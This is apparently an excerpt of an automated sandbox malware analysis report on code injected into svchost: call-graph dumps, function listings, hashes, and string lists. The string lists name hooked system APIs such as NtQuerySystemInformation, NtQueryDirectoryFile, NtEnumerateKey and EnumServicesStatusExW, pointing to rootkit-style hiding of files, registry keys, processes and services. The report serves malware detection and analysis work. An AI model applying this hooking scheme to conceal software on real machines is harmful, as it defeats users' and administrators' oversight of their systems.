13de2730ef5 8326->8327 8328 13de2730ec9 8326->8328 8327->8274 8328->8327 8332 13de27336e4 8328->8332 8331 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8331->8327 8333 13de27336ed 8332->8333 8334 13de2730eed 8332->8334 8368 13de27336b0 8333->8368 8334->8331 8337 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8338 13de2733716 8337->8338 8339 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8338->8339 8340 13de2733724 8339->8340 8341 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8340->8341 8342 13de2733732 8341->8342 8343 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8342->8343 8344 13de2733741 8343->8344 8345 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8344->8345 8346 13de273374d 8345->8346 8347 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8346->8347 8348 13de2733759 8347->8348 8349 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8348->8349 8350 13de2733765 8349->8350 8351 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8350->8351 8352 13de2733773 8351->8352 8353 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8352->8353 8354 13de2733781 8353->8354 8355 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8354->8355 8356 13de273378f 8355->8356 8357 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8356->8357 8358 13de273379d 8357->8358 8359 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8358->8359 8360 13de27337ac 8359->8360 8361 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8360->8361 8362 13de27337b8 8361->8362 8363 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8362->8363 8364 13de27337c4 8363->8364 8365 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8364->8365 8366 13de27337d0 8365->8366 8367 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8366->8367 8367->8334 8369 13de27336d7 8368->8369 8370 13de27336c6 8368->8370 8369->8337 8370->8369 8371 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8370->8371 8371->8370 9292 13de272783c 9293 13de272785d 9292->9293 9294 13de2727858 9292->9294 9296 13de2727970 9294->9296 9297 13de2727993 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9296->9297 9298 13de2727a07 9296->9298 9297->9298 9298->9293 10033 13de272cb3c 10034 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10033->10034 10035 13de272cb4c 10034->10035 10036 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10035->10036 10037 13de272cb60 10036->10037 10038 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10037->10038 10039 13de272cb74 10038->10039 10040 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10039->10040 10041 13de272cb88 10040->10041 9085 13de272fda0 GetProcessHeap 9086 13de2735b9f 9087 13de2735bb7 9086->9087 9093 13de2735c22 9086->9093 9088 13de2728c04 _CallSETranslator 5 API calls 9087->9088 9087->9093 9089 13de2735c04 9088->9089 9090 13de2728c04 _CallSETranslator 5 API calls 9089->9090 9091 13de2735c19 9090->9091 9092 13de272cc18 17 API calls 9091->9092 9092->9093 9580 13de2727aa0 9581 13de2727aa9 __scrt_acquire_startup_lock 9580->9581 9583 13de2727aad 9581->9583 9584 13de272c4cc 9581->9584 9585 13de272c4ec 9584->9585 9605 13de272c503 9584->9605 9586 13de272c4f4 9585->9586 9587 13de272c50a 9585->9587 9588 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9586->9588 9589 13de272f200 39 API calls 9587->9589 9590 13de272c4f9 9588->9590 9591 13de272c50f 9589->9591 9592 13de272dae0 _invalid_parameter_noinfo 20 API calls 9590->9592 9615 13de272e8e4 GetModuleFileNameW 9591->9615 9592->9605 9597 13de272c46c 7 API calls 9598 13de272c579 9597->9598 9599 13de272c581 9598->9599 9600 13de272c599 9598->9600 9601 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9599->9601 9602 13de272c2a4 17 API calls 9600->9602 9603 13de272c586 9601->9603 9606 13de272c5b5 9602->9606 9604 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9603->9604 9604->9605 9605->9583 9608 13de272c600 9606->9608 9609 13de272c5e7 9606->9609 9614 13de272c5bb 9606->9614 9607 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9607->9605 9612 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9608->9612 9610 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9609->9610 9611 13de272c5f0 9610->9611 9613 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9611->9613 9612->9614 9613->9605 9614->9607 9616 13de272e93d 9615->9616 9617 13de272e929 Concurrency::details::SchedulerProxy::DeleteThis 9615->9617 9618 13de272e724 17 API calls 9616->9618 9620 13de272db90 7 API calls 9617->9620 9619 13de272e96b 9618->9619 9622 13de272fb18 4 API calls 9619->9622 9624 13de272e97c 9619->9624 9621 13de272e936 9620->9621 9625 13de2727950 _log10_special IsProcessorFeaturePresent 9621->9625 9622->9624 9633 13de272e7c8 9624->9633 9626 13de272c526 9625->9626 9627 13de272c2a4 9626->9627 9629 13de272c2e2 9627->9629 9631 13de272c34e 9629->9631 9642 13de272f5b0 9629->9642 9630 13de272c43f 9630->9597 9631->9630 9632 13de272f5b0 17 API calls 9631->9632 9632->9631 9634 13de272e807 9633->9634 9636 13de272e7ec 9633->9636 9637 13de272e86a Concurrency::details::SchedulerProxy::DeleteThis 9634->9637 9638 13de272e80c 9634->9638 9635 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9635->9636 9636->9621 9637->9636 9639 13de272db90 7 API calls 9637->9639 9638->9635 9638->9636 9640 13de272e877 9639->9640 9641 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9640->9641 9641->9636 9643 13de272f53c 9642->9643 9644 13de272e724 17 API calls 9643->9644 9645 13de272f560 9644->9645 9645->9629 9094 13de27229a4 9096 13de27229f8 9094->9096 9095 13de2722a13 9096->9095 9098 13de2723144 9096->9098 9099 13de27231da 9098->9099 9101 13de2723169 9098->9101 9099->9095 9100 13de2723858 StrCmpNIW 9100->9101 9101->9099 9101->9100 9102 13de2721ce8 StrCmpIW StrCmpW 9101->9102 9102->9101 9646 13de27214a4 9647 13de27214e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 9646->9647 9648 13de27214c6 GetProcessHeap HeapFree 9646->9648 9649 13de2736180 9647->9649 9648->9647 9648->9648 9650 13de272caa4 9653 13de272c854 9650->9653 9660 13de272c81c 9653->9660 9658 13de272c7d8 7 API calls 9659 13de272c887 9658->9659 9661 13de272c831 9660->9661 9662 13de272c82c 9660->9662 9664 13de272c838 9661->9664 9663 13de272c7d8 7 API calls 9662->9663 9663->9661 9665 13de272c84d 9664->9665 9666 13de272c848 9664->9666 9665->9658 9667 13de272c7d8 7 API calls 9666->9667 9667->9665 10042 13de2727b2c 10043 13de2727b50 __scrt_acquire_startup_lock 10042->10043 10044 13de272be55 10043->10044 10045 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10043->10045 10046 13de272be7e _invalid_parameter_noinfo 10045->10046

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 0000013DE2722034 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 18 13de2722034-13de272205f call 13de2742d70 20 13de2722065-13de272206e 18->20 21 13de2722070-13de2722074 20->21 22 13de2722077-13de272207a 20->22 21->22 23 13de2722080-13de2722083 22->23 24 13de272222b-13de272224b 22->24 25 13de272217b-13de272217e 23->25 26 13de2722089-13de272209b 23->26 27 13de27221ef-13de27221f2 25->27 28 13de2722180-13de272219a call 13de2722f18 25->28 26->24 29 13de27220a1-13de27220ad 26->29 27->24 33 13de27221f4-13de2722207 call 13de2722f18 27->33 28->24 38 13de27221a0-13de27221b6 28->38 31 13de27220af-13de27220bf 29->31 32 13de27220db-13de27220e6 call 13de2721bc4 29->32 31->32 35 13de27220c1-13de27220d9 StrCmpNIW 31->35 39 13de2722107-13de2722119 32->39 46 13de27220e8-13de2722100 call 13de2721bfc 32->46 33->24 45 13de2722209-13de2722211 33->45 35->32 35->39 38->24 44 13de27221b8-13de27221d4 38->44 42 13de272211b-13de272211d 39->42 43 13de2722129-13de272212b 39->43 47 13de272211f-13de2722122 42->47 48 13de2722124-13de2722127 42->48 49 13de272212d-13de2722130 43->49 50 13de2722132 43->50 51 13de27221d8-13de27221eb 44->51 45->24 52 13de2722213-13de272221b 45->52 46->39 60 13de2722102-13de2722105 46->60 54 13de2722135-13de2722138 47->54 48->54 49->54 50->54 51->51 55 13de27221ed 51->55 56 13de272221e-13de2722229 52->56 58 13de2722146-13de2722149 54->58 59 13de272213a-13de2722140 54->59 55->24 56->24 56->56 58->24 61 13de272214f-13de2722153 58->61 59->29 59->58 60->54 62 13de2722155-13de2722158 61->62 63 13de272216a-13de2722176 61->63 62->24 64 13de272215e-13de2722163 62->64 63->24 64->61 65 13de2722165 64->65 65->24
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 756756679-543223747
                                                                                                                                                                                                                                                • Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction ID: 66490ac6ba7d68a9c64cc0d4773b1818ba8c54fde1267231f19a9880e82c7aed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB518BB3B11A248AE761FE25F840BEA6BF4F708784F159535DF051AB84DB36CA52E300
                                                                                                                                                                                                                                                Function 0000013DE27232A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: 09d6951cfe52e120f864e029d0e2ce767c0caa2abbe53b2d0ee1bc4b66c716bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1180B27106458EFB60B721BA457D96FB4BBD4705F148036DD868D292EF3CC354B614
                                                                                                                                                                                                                                                Function 0000013DE2721AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: GetProcessHeap.KERNEL32 ref: 0000013DE272163B
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: HeapAlloc.KERNEL32 ref: 0000013DE272164A
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27216BA
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27216E7
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721701
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721721
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE272173C
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE272175C
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721777
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721797
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27217B2
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27217D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 0000013DE2721ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 0000013DE2721AE5
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27217ED
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE272180D
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721828
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721848
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721863
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721883
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE272189E
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27218A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: ee3d420d2bed2a93ebf437c3b8b3650750b4b589fd8ec1a2115b6d7d2847829d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131FCB77106058AFB50BB27F9413E92BB4BB48BC0F1C4431DE098F697EE24CB51A654
                                                                                                                                                                                                                                                Function 0000013DE272DC3C Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 105 13de272dc3c-13de272dc4b 106 13de272dc4d-13de272dc59 105->106 107 13de272dc5b-13de272dc6b 105->107 106->107 108 13de272dc9e-13de272dca9 call 13de272dc1c 106->108 109 13de272dc82-13de272dc9a HeapAlloc 107->109 115 13de272dcab-13de272dcb0 108->115 111 13de272dc6d-13de272dc74 call 13de2730c90 109->111 112 13de272dc9c 109->112 111->108 117 13de272dc76-13de272dc80 call 13de272bdcc 111->117 112->115 117->108 117->109
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5937327315f5dacd8a69296d7de6a9ea1e39cbd8e21a565ac7b94a8f347e64da
                                                                                                                                                                                                                                                • Instruction ID: accbb15337b3c1a9c3f48d10cc4b64dd2beac0c0d08ebb25bebe2cae6af14786
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5937327315f5dacd8a69296d7de6a9ea1e39cbd8e21a565ac7b94a8f347e64da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F090F63032054DFE6577A2BD413E65AF94B98B80F1C64308D0A8E3C2EDACC7C0A210

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 0000013DE2727D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: c4422f5ad3ecd5474b844b9a0fa355b7ce543f68c9d0c8a1650c8f6f1dce4e95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40314D76214B808AEB61AF61F8807EE7774F784744F54402ADA4E4BB98EF38C748D714
                                                                                                                                                                                                                                                Function 0000013DE272D814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: aa673ecea9234ec1e8bfbeb6c15acee4448dfc72735fc9ceeb0c65659b167b0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36316D72214B808AEB61EF25F8403DE77B4F789754F540126EA9D4BBA9DF38C646CB00
                                                                                                                                                                                                                                                Function 0000013DE2721D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: f20ba19593c990827f418985f895d93345b8695da60fdc658fd19179fa43d36d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231A1BA211A4AACEA05FF66FC517E56B30BB44344F940433D8190E172EF78C35AE390
                                                                                                                                                                                                                                                Function 0000013DE272F904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: 58ce32f5426b21fd41caa2a0010e1167bec3a13205982a5c6b2ba52985821585
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4541D073315A0059FA16FB26B8047D52BB1FB4ABE0F194139DD099F7A4EA38C745E305
                                                                                                                                                                                                                                                Function 0000013DE272104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 509 13de272104c-13de27210b9 RegQueryInfoKeyW 510 13de27210bf-13de27210c9 509->510 511 13de27211b5-13de27211d0 509->511 510->511 512 13de27210cf-13de272111f RegEnumValueW 510->512 513 13de27211a5-13de27211af 512->513 514 13de2721125-13de272112a 512->514 513->511 513->512 514->513 515 13de272112c-13de2721135 514->515 516 13de2721147-13de272114c 515->516 517 13de2721137 515->517 519 13de272114e-13de2721193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 516->519 520 13de2721199-13de27211a3 516->520 518 13de272113b-13de272113f 517->518 518->513 521 13de2721141-13de2721145 518->521 519->520 520->513 521->516 521->518
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 82e34b841ad87f90b2aa9925f031613ffe6ac0b284e38c5b5e6a0650957d7bfb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9416F73614B84CAE760EF21F44479E7BB1F388B98F548129DA890BB58DF38C649CB40
                                                                                                                                                                                                                                                Function 0000013DE272D5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 5d2058687aeb95afa525a02ce3c7af05a5119e3058634ce727394fa105d65644
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 461182B27052408DFA58B7367E513EA29F2AB447F0F184334E87D4E7D6DE28D741A601
                                                                                                                                                                                                                                                Function 0000013DE2727520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
